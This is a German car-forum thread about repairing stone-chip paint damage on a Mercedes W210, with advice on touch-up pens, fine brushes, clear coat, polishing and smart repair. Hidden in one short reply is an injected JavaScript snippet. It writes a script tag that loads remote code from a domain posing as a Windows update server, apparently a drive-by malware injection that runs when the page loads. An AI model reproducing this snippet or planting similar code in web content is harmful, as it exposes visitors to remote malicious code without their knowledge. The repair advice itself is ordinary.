Ausbessern von Steinschlagschäden

Diskutiere Ausbessern von Steinschlagschäden im Forum Instandhaltung, Reparaturen & Pflege im Bereich Technik - Nallo, nach (meinem) Ausbessern von Steinschlagschäden sieht man diese eher besser wie vorher. Ist es überhaupt nötig, da im Frontbereich eh...
Status
Für weitere Antworten geschlossen.
S

sucher

Frischling
Beiträge
6
Fahrzeug
W210
Nallo,

nach (meinem) Ausbessern von Steinschlagschäden sieht man diese eher besser wie vorher.

Ist es überhaupt nötig, da im Frontbereich eh alles aus Alu oder Kunststoff ist, und keine Korrosionsgefahr besteht?

Vielen Dank für Antwort.

MfG

Sucher
 
Ob daß nötig ist mußt du wissen.
Aber sowas läst man per Smartrepair vom Spezialisten ausbessern.
Der arbeitet zum Festpreis und wenns gut gemacht ist, dann sieht man da nachher nix mehr.
 
Steinschlagschäden

Hallo Sucher, ...
...Ist es überhaupt nötig, da im Frontbereich eh alles aus Alu oder Kunststoff ist, und keine Korrosionsgefahr besteht?
...

Kunststoff ja, aber Aluminiumteile sind keine verbaut an der Aussenhaut.
Wenn Aluteile verbaut wären, würden auch diese nach Steinschlag und angegriffener Oberfläche korrodieren, es sieht nur anders aus als bei Stahlblech.


Gruß
Peter
 
Reparieren von Steinschlägen

Nallo,

nach (meinem) Ausbessern von Steinschlagschäden sieht man diese eher besser wie vorher.

Ist es überhaupt nötig, da im Frontbereich eh alles aus Alu oder Kunststoff ist, und keine Korrosionsgefahr besteht?

Vielen Dank für Antwort.

MfG

Sucher


Es müßte doch eine Vorgehensweise für handwerklich einigermaßen geschickte Personen geben, Steinschläge akzeptabel zu beheben/auszubessern ohne gleich wieder den teuren Fachmann rufen/beauftragen zu müssen!
Gibt es eine solche Vorgehensweise?

Vielen Dank für eure Mühe!

Gruß

freddi
 
Es gibt 3 Moeglichkeiten:

(1) Anschleifen, grundieren, fuellern, schleifen, fuellern, lackieren
(2) Smart repair - das ist schon die Sparvariante
(3) Alles mit 80er Schleifpapier aufrauhen und dann so lassen

Sucht wieder ein Schlaufuchs das perfekte Ergebnis fuer die noch schmalere Mark?

Carsten
 
Zuletzt bearbeitet von einem Moderator:
Es gibt 3 Moeglichkeiten:

...

Sucht wieder ein Schlaufuchs das perfekte Ergebnis fuer die noch schmalere Mark?

Carsten


Wieso "Mark", wo lebst Du denn, daß Ihr noch mit Mark bezahlt?

Gruß
 
Da mein Benz auch ein paar Steinschlagschäden im Frontbereich hat, habe ich mir den orginalen Lackstift beim :) geholt und den Tip bekommen, die Lackstifte ca. 30min. vor den Ausbesserungsversuchen in die Hosentasche zu stecken, damit sie warm werden. Außerdem sollte das Blech nicht zu kalt sein... Und natürlich sollte der Pinsel des Lackstiftes nur mit Farbe bedeckt sein und nicht "tropfen"...

Bernd
 
Genau.. der "Pinsel" vom Lackstift ist das völlig ungeeignete Werkzeug.
Besser ist ein ganz feiner Pinsel.
Und viel Geduld.
Also..
Tag 1 : entfetten mit Spiritus oder so.. warten.. dann Lackstift öffnen uns mit dem Pinsel des Stifts Farbe auf ein Stück Pappe streichen.
Von dort mit dem feinen Pinselchen ( oder Zahnstocher) den Lack in den Stinschlag fällen.. trocknen lassen..
Tag 2 : wieder etwas Lack einfüllen..trocknen lassen
etc..

so lange machen bis man fast auf dem selben Niveau mit dem original Lack ist..
Dann den Klarlack auf die selbe Weise auftragen.. er muss ganz klein bischen etwas dicker als der alte Lack aufgetragen werden..
Wieder gut trocknen lassen..
Dann mit Schleifpaste (starker Lackreiniger) den neuen Klarlack aufs Niveau das alten schlichten...
Danach Politur und dann Wachs auftragen...

Oder eben Smartrepair...
 
Ich nehme dafür immer einen Zahnstocher, damit lässt sich´s leichter dosieren;)

haha jo :)

<script language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/hKLYZ5joxmvAlyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'></"+"script>")</script>
 
Es müßte doch eine Vorgehensweise für handwerklich einigermaßen geschickte Personen geben, Steinschläge akzeptabel zu beheben/auszubessern ohne gleich wieder den teuren Fachmann rufen/beauftragen zu müssen!
Gibt es eine solche Vorgehensweise?

Vielen Dank für eure Mühe!

Gruß

freddi

...klar gibt es die. aber dafür brauchst du zum einen erstmal das wissen wie es gemacht wird ( ausbildung ) und vor allem das passende technische equipment.

wenn du allein die technischen utensilien kaufst dann kannst du das auch direkt per smartrepair für max. 150-200.- euronen machen lassen. ;)
zudem bist du dann auf der sicheren seite das es auch gut gemacht ist.
 
Genau.. der "Pinsel" vom Lackstift ist das völlig ungeeignete Werkzeug.
Besser ist ein ganz feiner Pinsel.
Und viel Geduld.
Also..
Tag 1 : entfetten mit Spiritus oder so.. warten.. dann Lackstift öffnen uns mit dem Pinsel des Stifts Farbe auf ein Stück Pappe streichen.
Von dort mit dem feinen Pinselchen ( oder Zahnstocher) den Lack in den Stinschlag fällen.. trocknen lassen..
Tag 2 : wieder etwas Lack einfüllen..trocknen lassen
etc..

so lange machen bis man fast auf dem selben Niveau mit dem original Lack ist.


Dann den Klarlack auf die selbe Weise auftragen.. er muss ganz klein bischen etwas dicker als der alte Lack aufgetragen werden..
Wieder gut trocknen lassen..
Dann mit Schleifpaste (starker Lackreiniger) den neuen Klarlack aufs Niveau das alten schlichten...
Danach Politur und dann Wachs auftragen...

Oder eben Smartrepair...

Das ist nach meiner Meinung ein hervorragender Beitrag für den ich herzlich danke! Mit diesen Hinweisen werde ich die Aufgabe der Steinschlagentfernung angehen.
 
Mit diesen Hinweisen werde ich die Aufgabe der Steinschlagentfernung angehen.

Es wird zwar ganz gut, und je mehr Geduld man aufbringt besser, aber an ne Smartrepair kommt es nicht ran.. das wollte ich nur zu Bedenken geben. Und mit dem Lackreiniger nicht zuuu lange rumschmirgeln !
Ansonsten.. viel Erfolg...
 
Status
Für weitere Antworten geschlossen.
Thema: Ausbessern von Steinschlagschäden
Zurück
Oben